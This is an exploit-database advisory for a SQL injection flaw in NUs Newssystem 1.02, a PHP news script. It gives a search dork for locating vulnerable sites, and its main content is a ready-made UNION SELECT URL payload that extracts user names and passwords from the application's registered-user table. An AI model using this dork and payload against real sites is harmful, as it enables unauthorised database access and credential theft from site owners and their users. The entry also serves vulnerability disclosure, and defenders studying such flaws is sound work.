NUs Newssystem v1.02 (id) SQL Injection Vulnerability

EDB-ID: 11674	CVE: 2010-5060	OSVDB-ID: 62840
Author: n3w7u	Published: 2010-03-09	Verified:
Exploit Code:	Vulnerable App:

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
 ~ NUs Newssystem 1.02 (id) SQL Injection Vulnerability ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
[+] Autor: n3w7u
[+] Page: http://www.internet-works.de/home.html
[+] Vulnerabilities [ SQL Injection ]
[+] Language: [ PHP ]
[+] Version: 1.02
[+] Dork : inurl:"?pageNum_RSnews"&view
.-=--=--=--=--=--=--=--=--=--=--=-.
[+] Vulnerability
    Nus.php?pageNum_RSnews=0&id=
[+] Exploitable
    http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser--

Comments

NUs Newssystem v1.02 (id) SQL Injection Vulnerability

Rating

No comments so far